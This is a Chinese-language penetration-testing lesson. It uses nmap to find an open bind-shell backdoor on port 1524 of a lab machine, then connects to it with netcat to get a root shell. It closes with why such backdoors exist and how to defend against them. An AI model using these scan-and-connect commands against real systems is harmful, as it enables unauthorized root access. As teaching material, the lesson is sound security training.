6-18漏洞利用-后门连接

后门连接探测

某些情况下，服务器可能存在某些后门，可以使用Nmap进行探测和尝试。

我们之前就已经探测了他对应的端口与服务，然后对目标的IP地址进行探测

nmap -sV -p 1524 192.168.1.105

可以看到这里给出了一个service，说是给了一个绑定shell，以及它的banner信息，root shell

nmap 192.168.1.105

我们在这里看到ingreslock内容，我们可以进一步探测

nmap -p 1524 -sV 192.168.1.105

我们根据bindshell，猜测到，会是一个后门程序，这个时候，我们就需要验证这个猜测，我们用nc连接目标地址的端口号，来对其后门进行连接，从而获取对应的权限

nc连接后门获取权限

Nc 目标IP 端口号 连接后门程序。

nc 192.168.1.105 1524

连接之后，我们可以执行对应的命令，使用id和whoami来查看当前的权限，以及执行其它的系统命令

ifconfig
//查看当前连接到的服务器IP地址

id
whoami
hostname

我们以root权限登录到远程目标的服务器上面，执行最高权限的命令

我们服务器为什么存在后门程序

1、我们当前的服务器已经遭受过对应的黑客攻击，使得它在原有的服务器上面留了个后门，我们通过检测发现到这个后门，就可以直接顺着它的shell，进行连接

2、系统管理员，在某些情况下，需要对远程的机器进行管理，但是在管理的过程中，需要对应的反弹shell，这个时候，它很有可能开启了一个等待连接的shell，我们直接连接这个端口号，循着管理员的思路、方法、路径，进到系统中

3、某些软件本身就存在连接shell后门，这个时候，我们可以直接进行连接，连接到对应的shell

如何进行防御

我们一定要检测，当前系统，开放了那些端口，在某些情况下，尽量没有使用的端口，尽量关闭，我们只开启，我们服务器运行状态下，必须要开启的端口号，不相关的端口号，直接关闭，当然，我们也要实时监测系统服务器的网络状态，在出现连接过程中，我们一定要注意很有可能，这就是一次连接后门程序的一个活动，我们要对它进行实时监控